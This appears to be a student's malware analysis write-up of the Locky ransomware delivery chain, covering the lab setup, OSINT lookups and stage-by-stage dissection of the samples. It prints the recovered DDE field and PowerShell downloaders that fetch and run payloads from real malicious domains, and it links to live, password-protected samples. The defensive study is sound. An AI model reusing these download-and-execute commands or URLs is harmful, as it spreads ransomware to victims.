# ma-locky-simple

## About
This page contains the results of my research done while studying a specific malware & botnet part of the Malware Analysis module during my Cybersecurity PGD. It is a short analysis exercise over the Locky ransomware delivery chain, from the initial malicious e-mail up to decryption of the 1st stage PE executable.

## Objective
The objective was to dive into the practical side of Malware Analysis, having spent considerable amount of time doing online research I wanted to see if I could conduct a practical analysis of the studied malware using the tools and techniques researched and put the aquired knowledge into practice.

## Quick synopsis
Locky malware samples are mostly delivered through ransomware campaigns which make use of social engineering techniques by exploiting the human factor. The malware originates from Necurs botnet, a network of infected computers infected by malware, and arrives via spam e-mail campaigns that contain malicious Office documents attached; once executed it encrypts the infected machine’s files. Upon encrypting the files, it shows a message with instructions demanding payment for the files to be decrypted. Recently, Microsoft and various partners in 35 countries attempted to sinkhole Necurs, by taking control of the internet infrastructure based in the U.S. that the botnet Necurs uses to distribute malware and infect the victim’s computers after breaking the Necurs DGA (Domain Generator Algorithm) component that it uses in order to generate random domain names. 

## Methodology
The strategy for gathering information was based on open source intelligence gathering, resorting to publicly available industry reports and was based on various analysis done by Malware Analysts available on-line. A quick search using SearX search engine listed a few links of interest; Malware Traffic Analysis website was used to download material to serve as base for this research. From the initial investigations on the Locky malware, online research allowed to correlate the sample of malware to the botnet itself. The preferred sources for this paper were industry sources as Microsoft and BitSight were used for information. VirusTotal website was used to extract valuable information such as filenames, hashes, Anti-virus detection capabilities and file sizes from an existing analysis done on the payload delivered by the botnet. ShadowServer website was used to collect data about the botnet, referring to an analysis report of the Necurs botnet and its C2 capabilities.

## Approach
The approach taken was to use freely available resources to conduct the research, Malware Traffic Analysis website provided the pcap binary containing the malicious files and the network traffic that was analysed. The malicious files were extracted from the pcap file and handled manually on a test environment built for this purpose; from the initial e-mail document to the Locky payload an oracle tool was built in order to keep track of the progress of the analysis and provide a structure for the capture of the files. Scraper scripts were written to help investigate in a OSINT manner possible points of interest. All analysis was performed while investigating various techniques about how to handle the payloads, decrypting, deobfuscating, extracting and be able to progress to the next analysis stage.

### Analysis references
- http://www.malware-traffic-analysis.net/2017/10/19/index.html
- https://isc.sans.edu/forums/diary/Necurs+Botnet+malspam+pushes+Locky+using+DDE+attack/22946/ 
- https://www.pandasecurity.com/mediacenter/pandalabs/word-exploit/
- https://www.bleepingcomputer.com/news/security/microsoft-office-attack-runs-malware-without-needing-macros/
- https://blog.nviso.eu/2017/10/11/detecting-dde-in-ms-office-documents/ 
- https://cybersigna.com/raticate-group-hits-industrial-firms-with-revolving-payloads-threatpost/
- https://hshrzd.wordpress.com/2016/07/03/unpacking-nsis-based-crypter-step-by-step/
- https://blog.malwarebytes.com/threat-analysis/2013/05/nowhere-to-hide-three-methods-of-xor-obfuscation/

## Quick description of the Botnet
The Necurs botnet was first observed in 2012, and it is thought to be operated by cybercriminals based in Russia. This botnet is believed to be managed by the creators of Dridex banking Trojan known as Evil Corp and has been responsible for the distribution of different families of malware like ransomware, Trojans and crypto mining and has infected millions of computers worldwide. Necurs botnet is primarily used as a dropper for malware like GameOver Zeus, Dridex, Locky, Trickbot and others.

## Botnet references:
- Sans (2017), Necurs Botnet malspam pushes Locky using DDE attack, Available at: https://isc.sans.edu/forums/diary/Necurs+Botnet+malspam+pushes+Locky+using+DDE+attack/22946/ [Accessed 11 August 2020].
- Malware Traffic Analysis (2017), 2017-10-19 - PCAP/MALWARE FOR AN ISC DIARY
(NECURS BOTNET MALSPAM USES DDE ATTACK), Available at: http://www.malware-traffic-analysis.net/2017/10/19/index.html [Accessed 11 August 2020].
- Microsoft (2020), New action to disrupt world’s largest online criminal network, Available at: https://blogs.microsoft.com/on-the-issues/2020/03/10/necurs-botnet-cyber-crime-disrupt/ [Accessed 18 August 2020].
- ZDNet (2020), Microsoft orchestrates coordinated takedown of Necurs botnet, Available at: https://www.zdnet.com/article/microsoft-orchestrates-coordinated-takedown-of-necurs-botnet [Accessed 18 August 2020].
- BitSight (2020), Joint Effort with Microsoft to Disrupt Massive Criminal Botnet Necurs
https://www.bitsight.com/blog/joint-effort-with-microsoft-to-takedown-massive-criminal-botnet-necurs [Accessed 18 August 2020].
- ShadowServer (2020), Has The Sun Set On The Necurs Botnet?, https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/ [Accessed 18 August 2020].

## Delivery chain
Different campaigns can make use of different chains for delivery of the malicious playloads, this diagram represents the delivery chain as part of this analysis:

![](./files/Locky_delivery_chain.png)

## Quick description of the Malware
Locky is a piece os malicious code classified as a ransomware malware first surfaced in 2016 suspected originating from threat actor Dridex gang group. The malware is delivered as part of ransomware campaigns. The malware arrives via spam e-mail campaigns that contain malicious Office documents attached. Locky encrypts files present in 3 types of local drives: fixed, removable and ram-disks as well as network resources (network shares). When it finishes encrypting the files, it shows a message with instructions demanding payment for the files to be decrypted.

## Malware references:
- Malwarebytes (2016) Look Into Locky Ransomware, Available at: https://blog.malwarebytes.com/threat-analysis/2016/03/look-into-locky [Accessed 13 July 2020].
- Malwarebytes (2020) Ransomware, Available at: https://www.malwarebytes.com/ransomware [Accessed 14 July 2020].
- Avast (2016) A deep and technical look into the latest ransomware called Locky, Available at: https://blog.avast.com/a-closer-look-at-the-locky-ransomware [Accessed 15 July 2020].
- Sensepost (2016) Understanding Locky, available at: https://sensepost.com/blog/2016/understanding-locky/ [Accessed 15 July 2020].
- Proofpoint (2016) Dridex Actors Get In the Ransomware Game With "Locky", Available at: https://www.proofpoint.com/us/threat-insight/post/Dridex-Actors-Get-In-the-Ransomware-Game-With-Locky [Accessed 26 July 2020].

## Analysis

### Environment
Two guest virtual machines were created and setup, with each one built to assume a different role during the analysis of the malware. 

![](./files/Network_Malware_Analysis_POST.png)

#### Gateway machine
| Name | Name | Rationale |
| --- | --- | --- |
| Name | Gateway | To be able to uniquely identify the machine |
| Operating System | Linux (Ubuntu 20.04 Server LTS) | A different Operating System from the infected Target virtual machine using ELF (Executable and Linkable Format) executables which prevents the execution of the malware binaries |
| Architecture | 64 Bits | A modern architecture |
| Number of CPUs | 4 virtual CPUs | To help prevent detection of the virtualized environment by the malware |
| Disk space allocated | 60 GB | To install all necessary software |
| RAM | 4096 Mb (32 Mb Video memory) | For performance and help prevent the detection of the virtualized environment by the malware |
| Network Adapter #1 | NAT (Network Address Translation) - IP Address: 10.0.2.15 - MAC Address: 08:00:27:3D:BE:5D | To be able to access the Internet to download software, updates or any other necessary files |
| Network Adapter #2 | Internal Network - Name: malwarenet - Promiscuous Mode: Allow All - IP Address: 192.168.100.10 | To provide simulated network connectivity to the VM, Promiscuous mode was set to Allow All in order to allow the network adapter to be able to see all traffic and run properly all network tools |
| Network Gateway | 192.168.100.1 (Internal Network LAN) 10.0.2.2 (NAT WAN) | (N/A) Default values |
| USB | USB Controller disabled | To prevent the hypervisor from automatically mounting any USB device connected to the host |
| Shared Folders | Enabled | Not mounted by default, to be able to transfer files with the host machine when needed |
| Guest Additions | Installed | To increase performance and add extra functionality |

#### Analysis (infected) machine
| Name | Name | Rationale |
| --- | --- | --- |
| Name | WIN7-32 | To be able to uniquely identify the machine |
| Operating System | Microsoft Windows 7 SP 1 | Currently the most targeted OS by malware |
| Architecture | 32 Bits | Currently the most targeted architecture |
| Number of CPUs | 2 virtual CPUs | To help prevent detection of  the virtualized environment by the malware |
| Disk space allocated | 120 GB | To install all necessary software and help prevent VM detection |
| RAM | 4096 Mb (128 Mb Video memory) | For performance and help prevent the detection of the virtualized environment by the malware |
| Network Adapter | Internal Network - Name: malwarenet - Promiscuous Mode: Allow VMs -	IP Address: 192.168.100.20 - Mac Address: B4:2E:99:18:0D:39 | To provide network connectivity to the VM in case the malware requires network access, Promiscuous mode was set to Allow VMs in order to prevent the host from sending data to the guest but allowing proper communication between VMs on the internal network, the Mac address was modified to be different from a VirtualBox Mac address to prevent identification of the VM environment |
| Network Gateway & DNS Server | 192.168.100.10 (Internal Network LAN) | To direct all network traffic into the analysis virtual machine |
| USB | USB Controller disabled | To prevent the hypervisor from automatically mounting and giving access to the guest virtual machine to any USB device connected to the host |
| Shared Folders | Disabled | To prevent the hypervisor from automatically mounting and giving access to the guest virtual machine to any USB device connected to the host |
| Guest Additions | Not Installed | To help prevent detection of  the virtualized environment by the malware |

#### Network
The setup used an Internal Network type to provide network connectivity to both virtual machines in the lab. Two different proxy tools were used, BurpSuite can be used to perform a Man In The Middle attack modifying the network traffic if required and PolarProxy allows decryption of TLS encrypted traffic from malware; both tools provide certificates to enable encrypted traffic communications. The command used to create the network was: `VBoxManage dhcpserver add --netname malwarenet --ip 192.168.100.1 --netmask 255.255.255.0 --lowerip 192.168.100.2 --upperip 192.168.100.254 --enable`. Each machine was given a fixed IP address; the Windows virtual machine makes use of 192.168.100.20 and the Linux virtual machine uses 192.168.100.10. Network traffic was redirected from the Windows machine to the Linux machine assuming the role of a gateway. INetSim, BurpSuite and IPTables were used to create a simulated network environment. When using InetSim + BurpSuite the following iptables rules are enabled `iptables -t nat -A PREROUTING -i enp0s8 -p tcp --dport 443 -j REDIRECT --to-port 8443`, and when using InetSim + PolarProxy `iptables -t nat -A PREROUTING -i enp0s8 -p tcp --dport 443 -j REDIRECT --to 10443; iptables -t nat -A PREROUTING -i enp0s8 -p tcp --dport 465 -j REDIRECT --to 10465; iptables -t nat -A PREROUTING -i enp0s8 -j REDIRECT`. Inetsim was used to simulate the necessary services while using the relevant port assignments for mapping against the above network rules. Assessment of the network communication between machines was tested with the ping command, for Windows machine ping 192.168.100.10, and for Linux machine ping 192.168.100.20 . A software firewall was used in the Linux machine with a rule added to prevent communication with the host machine; the command was `iptables –I OUTPUT –d 192.168.1.0/24 –j DROP`. This rule was tested with the command ping 192.168.1.3. The network traffic was validated by capturing a sample in pcap format of the traffic between the Gateway and the Analysis machine using the command `tshark –i enp0s8 –w /lab/data/validation.pcap –F pcap` the list of IP addresses the machines used for communication was then shown using the command `tshark –r /lab/data/validation.pcap –T fields –e ip.src –e ip.dst | sort | uniq`.

### Tools
- [InetSim](https://www.inetsim.org/)
- [InetSim-Manager](https://gitlab.com/antonio.godinho/inetsim-manager)
- [BurpSuite](https://portswigger.net/burp)
- [PolarProxy](https://www.netresec.com/?page=PolarProxy)
- [Oracle](https://gitlab.com/antonio.godinho/ma-oracle)
- [CyberChef](https://gchq.github.io/CyberChef/)
- base64
- [oledump.py](https://blog.didierstevens.com/?s=oledump)
- [zipdump.py](https://blog.didierstevens.com/?s=zipdump)
- [Microsoft VS Code](https://code.visualstudio.com/)
- [Wireshark](https://www.wireshark.org/)
- file
- [Detect It Easy](https://github.com/horsicq/Detect-It-Easy)
- 7z
- [binwalk](https://github.com/ReFirmLabs/binwalk)
- [hexyl](https://github.com/sharkdp/hexyl)
- [xortool.py](https://github.com/hellman/xortool)
- [Cutter](https://cutter.re/)

### OSINT 
- [Scraper scripts](https://gitlab.com/antonio.godinho/ma-scripts)
- [Google translate](https://translate.google.com/)
- [Hybrid Analysis](https://www.hybrid-analysis.com/)
- [ThreatMiner](https://www.threatminer.org/)
- [VirusTotal](https://www.virustotal.com/)
- [AlienVault](https://otx.alienvault.com/)
- [Shodan](https://www.shodan.io/)

### Files analysed
All files analysed originate from the binary pcap file [2017-10-19-Necurs-Botnet-malspam-pushing-Locky.pcap](https://gitlab.com/antonio.godinho/ma-locky-simple/-/blob/master/files/02105eaa401422aa4c73d9f9e4ae15721c2dd2068def7edee50ca51a3e3163d8/2017-10-19-Necurs-Botnet-malspam-pushing-Locky.pcap)

| Name | SHA-256 |
| --- | --- |
| 2017-10-19-Necurs-Botnet-malspam-1028-UTC.txt | 849fb605534f9d5b972a01c002c3dbca469244672f57659de26a49b11bf67eb7 |
| mail_base64_decoded.sample | ea132c34ebbc591eda78531e2bfb9a4cb40e55a245191f54e82df25be9b58db2 |
| ekakva32.exe.zip | d2cca5f6109ec060596d7ea29a13328bd0133ced126ab70974936521db64b4f4 |
| 436625438 | ec8f5c4100e1449db3cc7ad94f436d1950460a9f0f3041c592d43ad373a62537 |


### Cyber Kill chain
- **Stage 1 - Reconnaissance:** Objective is to gather information passively, in order to mitigate against the attacker actions, limit the amount of public information available, as employee e-mail addresses or any other contact information on the company website or social networks, collect and log unique website visitor data to the company website and implement an IDS.

- **Stage 2 - Weaponization:** No direct visibility of the attacker actions, but can make use of this stage to prepare and understand current malware trends, build an oracle of malicious files with metadata for correlation, regarding artefacts common in past, and current malicious spam campaigns, patch management to prevent the exploitation of vulnerabilities, keeping AV, IDS rules, e-mail anti-spam rules updated and tuning the IDS to identify new exploits.

- **Stage 3 - Delivery:** First opportunity to effectively block the attack, mitigation includes implementing user awareness training against phishing campaigns, disabling Office macros, Javascript execution, and browser plug-ins where not needed, applying web and DNS filtering to prevent users from accessing malicious websites, not giving users admin rights to help contain any possible infection, and using SSL/TLS inspection in all delivery channels.

- **Stage 4 - Exploitation:** Objective is to gain access by exploiting vulnerabilities in software, hardware or exploiting the human factor as in for instance by misleading a user to open an attachment of a malicious mail and running a malicious macro. This stage can be mitigated with user awareness training, disabling Office macros, restricting administrator privileges, blocking shell code execution, running AV software, an audit process to forensically determine the origin of the exploit and having a sandbox to analyze patient zero infections to help detect executed exploits or block malicious files from infecting other users.

- **Stage 5 - Installation:** Objective is to gain persistent access to the system even when the system is patched or rebooted; mitigation actions include keeping audit logs of any files created altered or removed; track changes made to the registry, monitor common paths such as “%TEMP%” generating alerts. When an unexpected new file is detected then isolate and reimage the system to a good known state.

- **Stage 6 - Command & Control (C2):** Objective is to control the system remotely; this stage can be mitigated by using DNS redirect blocking malicious addresses, monitoring using NIDS the network for unusual activity as suspicious connections to telnet, SSH, and IRC. Network segmentation to prevent lateral movement, perform SSL/TLS deep packet inspection (encrypted GET requests), malware analysis and OSINT research should be done to gain knowledge of the attacker C2 control infrastructure.

- **Stage 7 - Actions on Objectives:** The objective is to achieve the mission goals, in this case financial gain. The last chance to break the chain by detecting data exfiltration as the malware sends a summary of how many files have been encrypted in a particular path back to its C2, any lateral movement attempts, unauthorized usage of user credentials, having forensics evidence (files, network packet capture).


### Stage 1 - Mail message:

**File:** [2017-10-19-Necurs-Botnet-malspam-1028-UTC.txt](https://gitlab.com/antonio.godinho/ma-locky-simple/-/blob/master/files/849fb605534f9d5b972a01c002c3dbca469244672f57659de26a49b11bf67eb7/2017-10-19-Necurs-Botnet-malspam-1028-UTC.txt)

**Details:**

| Field | Value |
| --- | --- |
| TIMESTAMP | 11/09/2020 20:26:24 |
| FILE | RFC 822 mail, ASCII text |
| MAGIC (HEX 32) | 0x52656365 |
| SHA256 | 849fb605534f9d5b972a01c002c3dbca469244672f57659de26a49b11bf67eb7 |
| SSDEEP | 384:TkR1AaA7A5DyTmyHT/AfZ3DKyOL4i0Tsd8O9n5ui1GZvc0+ImtimzfmqYGKK+:Q1AIsPIhGyO5wqb5FGZbuehK+,"2017-10-19-Necurs-Botnet-malspam-1028-UTC.txt" |
| File Name | 2017-10-19-Necurs-Botnet-malspam-1028-UTC.txt |
| File Size | 19 kB |
| File Modification Date/Time | 2017-10-19 18:34:23 |
| File Type | TXT |
| File Type Extension | txt |
| MIME Type | text/plain |
| MIME Encoding | us-ascii |
| Newlines | Unix LF |
| Line Count | 283 |
| Word Count | 323 |

- Contains Base64 encoded attachment:

  ![](./files/849fb605534f9d5b972a01c002c3dbca469244672f57659de26a49b11bf67eb7/screenshots/email_sample.png)

- Decoding attachment using CyberChef:

  ![](./files/849fb605534f9d5b972a01c002c3dbca469244672f57659de26a49b11bf67eb7/screenshots/cyberchef_base64.png)

- ID of the saved file, using file command:

  ![](./files/849fb605534f9d5b972a01c002c3dbca469244672f57659de26a49b11bf67eb7/screenshots/base64_decoded_fileid.png)

### Stage 2 - Word document:

**File:** [mail_base64_decoded.sample](https://gitlab.com/antonio.godinho/ma-locky-simple/-/blob/master/files/ea132c34ebbc591eda78531e2bfb9a4cb40e55a245191f54e82df25be9b58db2/mail_base64_decoded.sample)

**Details:**

| Field | Value |
| --- | --- |
| TIMESTAMP | 11/09/2020 20:46:25 |
| FILE | Microsoft Word 2007+ | 
| MAGIC (HEX 32) | 0x504b0304 | 
| SHA256 | ea132c34ebbc591eda78531e2bfb9a4cb40e55a245191f54e82df25be9b58db2 | 
| SSDEEP | 192:CtNCNMf8obL6bj9zJCvLecm8hhL46G0o2M8Uvnp3GlWZmTOeKfR6:aNSQmx1CTecm87XG0ogUh/UTtKfR6,"mail_base64_decoded.sample" | 
| File Name  | mail_base64_decoded.sample | 
| File Size  | 13 kB | 
| File Modification Date/Time | 2020-09-11 20:42:02 | 
| File Type | DOCX | 
| File Type Extension | docx | 
| MIME Type | application/vnd.openxmlformats-officedocument.wordprocessingml.document | 
| Zip Required Version | 20 | 
| Zip Bit Flag | 0x0006 | 
| Zip Compression | Deflated | 
| Zip Modify Date | 1980-01-01 00:00:00 | 
| Zip CRC | 0x6cd2a4df | 
| Zip Compressed Size | 346 | 
| Zip Uncompressed Size | 1312 | 
| Zip File Name | [Content_Types].xml | 
| Zip Required Version | 20 | 
| Zip Bit Flag | 0x0006 | 
| Zip Compression | Deflated | 
| Zip Modify Date | 1980-01-01 00:00:00 | 
| Zip CRC | 0xb71a911e | 
| Zip Compressed Size | 239 | 
| Zip Uncompressed Size | 590 | 
| Zip File Name | _rels/.rels | 
| Zip Required Version | 20 | 
| Zip Bit Flag | 0x0006 | 
| Zip Compression | Deflated | 
| Zip Modify Date | 1980-01-01 00:00:00 | 
| Zip CRC | 0x51b364d6 | 
| Zip Compressed Size | 244 | 
| Zip Uncompressed Size | 817 | 
| Zip File Name | word/_rels/document.xml.rels | 
| Zip Required Version | 20 | 
| Zip Bit Flag | 0x0006 | 
| Zip Compression | Deflated | 
| Zip Modify Date | 1980-01-01 00:00:00 | 
| Zip CRC | 0x5d47c9d3 | 
| Zip Compressed Size | 1340 | 
| Zip Uncompressed Size | 5716 | 
| Zip File Name | word/document.xml | 
| Zip Required Version | 20 | 
| Zip Bit Flag | 0x0006 | 
| Zip Compression | Deflated | 
| Zip Modify Date | 1980-01-01 00:00:00 | 
| Zip CRC | 0xb2ff4bb3 | 
| Zip Compressed Size | 1627 | 
| Zip Uncompressed Size | 6844 | 
| Zip File Name | word/theme/theme1.xml | 
| Zip Required Version | 20 | 
| Zip Bit Flag | 0x0002 | 
| Zip Compression | Deflated | 
| Zip Modify Date | 2017-10-19 12:44:02 | 
| Zip CRC | 0xfb584816 | 
| Zip Compressed Size | 1401 | 
| Zip Uncompressed Size | 4588 | 
| Zip File Name | word/settings.xml | 
| Zip Required Version | 20 | 
| Zip Bit Flag | 0x0006 | 
| Zip Compression | Deflated | 
| Zip Modify Date | 1980-01-01 00:00:00 | 
| Zip CRC | 0xdc20a119 | 
| Zip Compressed Size | 477 | 
| Zip Uncompressed Size | 1608 | 
| Zip File Name | word/fontTable.xml | 
| Zip Required Version | 20 | 
| Zip Bit Flag | 0x0006 | 
| Zip Compression | Deflated | 
| Zip Modify Date | 1980-01-01 00:00:00 | 
| Zip CRC | 0xa1df4da1 | 
| Zip Compressed Size | 500 | 
| Zip Uncompressed Size | 3801 | 
| Zip File Name | word/webSettings.xml | 
| Zip Required Version | 20 | 
| Zip Bit Flag | 0x0006 | 
| Zip Compression | Deflated | 
| Zip Modify Date | 1980-01-01 00:00:00 | 
| Zip CRC | 0xe3bbacf5 | 
| Zip Compressed Size | 496 | 
| Zip Uncompressed Size | 995 | 
| Zip File Name | docProps/app.xml | 
| Template | Normal | 
| Total Edit Time | 6.0 hours | 
| Pages | 2 | 
| Words | 34 | 
| Characters | 199 | 
| Application | Microsoft Office Word | 
| Doc Security | None | 
| Lines | 1 | 
| Paragraphs | 1 | 
| Scale Crop | No | 
| Heading Pairs | Название, 1 | 
| Titles Of Parts |  | 
| Company |  | 
| Links Up To Date | No | 
| Characters With Spaces | 232 | 
| Shared Doc | No | 
| Hyperlinks Changed | No | 
| App Version | 16.0000 | 
| Zip Required Version | 20 | 
| Zip Bit Flag | 0x0006 | 
| Zip Compression | Deflated | 
| Zip Modify Date | 1980-01-01 00:00:00 | 
| Zip CRC | 0xd9aae529 | 
| Zip Compressed Size | 369 | 
| Zip Uncompressed Size | 733 | 
| Zip File Name | docProps/core.xml | 
| Title |  | 
| Subject |  | 
| Creator | 1 | 
| Keywords |  | 
| Description |  | 
| Last Modified By | alex | 
| Revision Number | 87 | 
| Create Date | 2017-10-18 12:30:00 | 
| Modify Date | 2017-10-19 09:42:00 | 
| Zip Required Version | 20 | 
| Zip Bit Flag | 0x0006 | 
| Zip Compression | Deflated | 
| Zip Modify Date | 1980-01-01 00:00:00 | 
| Zip CRC | 0x5b87a9eb | 
| Zip Compressed Size | 3214 | 
| Zip Uncompressed Size | 30294 | 
| Zip File Name | word/styles.xml | 

- One point of interest, Google translate identifies Russian as language used:

  ![](./files/ea132c34ebbc591eda78531e2bfb9a4cb40e55a245191f54e82df25be9b58db2/screenshots/russian_language.png)

- OSINT using the file SHA provides extra details taken from online sandboxes, the complete output is available in the file [scan-online.txt](https://gitlab.com/antonio.godinho/ma-locky-simple/-/blob/master/files/ea132c34ebbc591eda78531e2bfb9a4cb40e55a245191f54e82df25be9b58db2/notes/scan-online.txt)

- Hybrid Analysis

  ![](./files/ea132c34ebbc591eda78531e2bfb9a4cb40e55a245191f54e82df25be9b58db2/screenshots/osint_hybrid_analysis.png)

- Threatminer

  ![](./files/ea132c34ebbc591eda78531e2bfb9a4cb40e55a245191f54e82df25be9b58db2/screenshots/osint_threatminer.png)

- VirusTotal

  ![](./files/ea132c34ebbc591eda78531e2bfb9a4cb40e55a245191f54e82df25be9b58db2/screenshots/osint_virustotal.png)

- Searching for OLE files using oledump, shows no OLE file was found inside the ZIP container:

  ![](./files/ea132c34ebbc591eda78531e2bfb9a4cb40e55a245191f54e82df25be9b58db2/screenshots/oledump_results.png)

- Zipdump tool making use of a Yara rule was used to look for the DDE field in the document:

  ![](./files/ea132c34ebbc591eda78531e2bfb9a4cb40e55a245191f54e82df25be9b58db2/screenshots/zipdump_yara_dde.png)

- After unziping the document, the resulting files:

  ![](./files/ea132c34ebbc591eda78531e2bfb9a4cb40e55a245191f54e82df25be9b58db2/screenshots/unzip.png)

### Stage 3 - Powershell script:

- Editing the document XML file in Visual Studio Code and searching for DDE, the next stage downloader code is visible:

  ![](./files/ea132c34ebbc591eda78531e2bfb9a4cb40e55a245191f54e82df25be9b58db2/screenshots/dde_code.png)

- Interesting lines of code:

  `
<w:instrText>C:\\Windows\\System32\\</w:instrText>
<w:instrText>cmd</w:instrText>
<w:instrText>.exe</w:instrText>
<w:instrText>"</w:instrText>
<w:instrText xml:space="preserve">/k </w:instrText>
<w:instrText xml:space="preserve">powershell </w:instrText>
<w:instrText xml:space="preserve">-NoP -sta -NonI </w:instrText>
<w:instrText>-w hidden</w:instrText>
<w:instrText>$e=</w:instrText>
<w:instrText>(New-Object System.Net.WebClient).DownloadString('</w:instrText>
<w:instrText>http://alexandradickman.com/KJHDhbje71</w:instrText>
<w:instrText>');</w:instrText>
<w:instrText>powershell</w:instrText>
<w:instrText xml:space="preserve">-e </w:instrText>
<w:instrText xml:space="preserve">$e </w:instrText>
<w:instrText>"  </w:instrText>
<w:t>Ошибка! Раздел не указан.</w:t>
`

- Powershell command:
  
  `
C:\\Windows\\System32\\cmd.exe "/k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('http://alexandradickman.com/KJHDhbje71'); powershell -e $e "
`

- Further OSINT investigation of the Domain and IPs allowed for more information. The file [scan-osint_domain_alexandradickman_com.txt](https://gitlab.com/antonio.godinho/ma-locky-simple/-/blob/master/files/ea132c34ebbc591eda78531e2bfb9a4cb40e55a245191f54e82df25be9b58db2/notes/scan-osint_domain_alexandradickman_com.txt) contains a full report of the results.

- OTX.AlienVault

  ![](./files/ea132c34ebbc591eda78531e2bfb9a4cb40e55a245191f54e82df25be9b58db2/screenshots/osint_otx_alienvault_id.png)

- OTX.AlienVault Passive DNS query:

  ![](./files/ea132c34ebbc591eda78531e2bfb9a4cb40e55a245191f54e82df25be9b58db2/screenshots/osint_otx_alienvault_passive_dns.png)

- Taking IP 98.124.251.65 as example, further OSINT research is performed:
[scan-osint_ip_98-124-251-65.txt](https://gitlab.com/antonio.godinho/ma-locky-simple/-/blob/master/files/ea132c34ebbc591eda78531e2bfb9a4cb40e55a245191f54e82df25be9b58db2/notes/scan-osint_ip_98-124-251-65.txt)

- Shodan:

  ![](./files/ea132c34ebbc591eda78531e2bfb9a4cb40e55a245191f54e82df25be9b58db2/screenshots/osint_shodan.png)

- ThreatMiner whois:

  ![](./files/ea132c34ebbc591eda78531e2bfb9a4cb40e55a245191f54e82df25be9b58db2/screenshots/osint_threatminer_ipwhois.png)

- ThreatMiner passive DNS query:

  ![](./files/ea132c34ebbc591eda78531e2bfb9a4cb40e55a245191f54e82df25be9b58db2/screenshots/osint_threatminer_ippassive_dns.png)

- Once the the user opens the document the following message requesting the user for action is shown, if the user clicks "Yes" then the downloader code is executed:

  ![](./files/ea132c34ebbc591eda78531e2bfb9a4cb40e55a245191f54e82df25be9b58db2/screenshots/execution.png)



**Wireshark PCAP:**
The following downloader downloads and executes a 32 bit executable binary which contains a malicious payload packed, this file was extracted from the PCAP file.

**File:** [2017-10-19-Necurs-Botnet-malspam-pushing-Locky.pcap](https://gitlab.com/antonio.godinho/ma-locky-simple/-/blob/master/files/02105eaa401422aa4c73d9f9e4ae15721c2dd2068def7edee50ca51a3e3163d8/2017-10-19-Necurs-Botnet-malspam-pushing-Locky.pcap)

- Filtering traffic with Wireshark using `(http.request or tls.handshake.type == 1 or tcp.flags eq 0x0002 or dns) and !(udp.port eq 1900)`

  ![](./files/02105eaa401422aa4c73d9f9e4ae15721c2dd2068def7edee50ca51a3e3163d8/screenshots/wireshark.png)

### Stage 4 - Powershell script:

- The first HTTP request contains a Base64 encoded string used in the URLs for the 1st-stage malware download:

  ![](./files/02105eaa401422aa4c73d9f9e4ae15721c2dd2068def7edee50ca51a3e3163d8/screenshots/wireshark_base64_encoded.png)

- CyberChef (From Base64 and Regular expression):

  ![](./files/02105eaa401422aa4c73d9f9e4ae15721c2dd2068def7edee50ca51a3e3163d8/screenshots/cyberchef_decoded_string.png)

- Code shows the Powershell script:
  
  ![](./files/02105eaa401422aa4c73d9f9e4ae15721c2dd2068def7edee50ca51a3e3163d8/screenshots/powershell_script_decoded.png)
  
  `
"http://shamanic-extracts.biz/eurgf837or", "http://centralbaptistchurchnj.org/eurgf837or", "", "http://conxibit.com/eurgf837or"
$fp = "$env:temp\rekakva32.exe"
$wc.DownloadFile($url, $fp)
Start - Process $fp 
`

- Wireshark `shamanic-extracts.biz` traffic:

  ![](./files/02105eaa401422aa4c73d9f9e4ae15721c2dd2068def7edee50ca51a3e3163d8/screenshots/wireshark_pefile.png)

- Extracting the 1st Stage PE Executable from the PCAP file:

  ![](./files/02105eaa401422aa4c73d9f9e4ae15721c2dd2068def7edee50ca51a3e3163d8/screenshots/wireshark_extract_pefile.png)

- Using command file to ID the file type:

  ![](./files/02105eaa401422aa4c73d9f9e4ae15721c2dd2068def7edee50ca51a3e3163d8/screenshots/extracted_pefile_id.png)



### Stage 5 - PE executable:

**File:** 
[ekakva32.exe.zip](https://gitlab.com/antonio.godinho/ma-locky-simple/-/blob/master/files/d2cca5f6109ec060596d7ea29a13328bd0133ced126ab70974936521db64b4f4/ekakva32.exe.zip) (Password: malware)

**Details**

| Field | Value |
| --- | --- |
| TIMESTAMP | 12/09/2020 10:12:05 |
| FILE | PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive |
| MAGIC (HEX 32) | 0x4d5a9000 |
| SHA256 | d2cca5f6109ec060596d7ea29a13328bd0133ced126ab70974936521db64b4f4 |
| SSDEEP | 3072:UNzPHk9Mpct45TCejxux30px3uGs3l52D83Sj:UhREKtjxk3msV52DWSj,"ekakva32.exe.sample" |
| File Name | ekakva32.exe.sample |
| File Size | 114 kB |
| File Modification Date/Time | 2020-09-12 10:01:15 |
| File Type | Win32 EXE |
| File Type Extension | exe |
| MIME Type | application/octet-stream |
| Machine Type | Intel 386 or later, and compatibles |
| Time Stamp | 2017-08-01 00:33:55 |
| Image File Characteristics | No relocs, Executable, No line numbers, No symbols, 32-bit |
| PE Type | PE32 |
| Linker Version | 6.0 |
| Code Size | 25088 |
| Initialized Data Size | 118784 |
| Uninitialized Data Size | 1024 |
| Entry Point | 0x330d |
| OS Version | 4.0 |
| Image Version | 6.0 |
| Subsystem Version | 4.0 |
| Subsystem | Windows GUI |

- This is a Nullsoft Installer executable file with the overlay section packed:

  ![](./files/d2cca5f6109ec060596d7ea29a13328bd0133ced126ab70974936521db64b4f4/screenshots/die.png)

- When run in the analysis machine, this file makes a copy of itself in the AppData\Local\Temp folder and adds the HKU\S-1-5-21-314286968-1272868024-28178371-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run registry key to achieve persistence 

  ![](./files/d2cca5f6109ec060596d7ea29a13328bd0133ced126ab70974936521db64b4f4/screenshots/eka_post_run_reg_entries.png)

- 7z was used to decompress the PE file:

  ![](./files/d2cca5f6109ec060596d7ea29a13328bd0133ced126ab70974936521db64b4f4/screenshots/7z_decompress_archive.png)

- Each decompressed file was identified by its type using `find . -type f | xargs file`:

  ![](./files/d2cca5f6109ec060596d7ea29a13328bd0133ced126ab70974936521db64b4f4/screenshots/id_file_by_type.png)



### Stage 6 - 436625438 file XOR data:

**File:** 
[436625438](https://gitlab.com/antonio.godinho/ma-locky-simple/-/blob/master/files/ec8f5c4100e1449db3cc7ad94f436d1950460a9f0f3041c592d43ad373a62537/436625438)

**Details**

| Field | Value |
| --- | --- |
| TIMESTAMP | 13/09/2020 17:55:31 |
| FILE | data |
| MAGIC (HEX 32) | 0x934bcf9c |
